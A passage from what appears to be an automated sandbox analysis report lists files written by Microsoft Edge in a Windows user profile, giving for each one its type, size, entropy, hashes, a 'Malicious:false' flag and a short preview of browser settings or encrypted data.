                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4c2fe.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                  MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                  SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                  SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                  SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:uriCache_

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.020952373252143
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQeVlk:YWLSGTt1o9LuLgfGBPAzkVj/T8lQ9
                                                                                                                                                                                                                                                                                                  MD5:A5B95D075BAD3D5F31F7B0740A8AAE1B
                                                                                                                                                                                                                                                                                                  SHA1:CD79B0F09765FFB5E570015CABF9F9A00485A56C
                                                                                                                                                                                                                                                                                                  SHA-256:FB922ED9E01E2C92D99AA69951E28DA97722AEE46DE3DF8DB62A536971845A8C
                                                                                                                                                                                                                                                                                                  SHA-512:6509DD8CF9D476B80C72C868BED2AB1D46B0CF19209D9C056B79E9BCE00CF173B9FD185DF91585AED36214C6395C89DC34EA760198DD1A132DD815B6540540C8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735380086482912}]}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                  MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                  SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                  SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                  SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d59d5f5a-daeb-4248-8375-9664ae610632.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
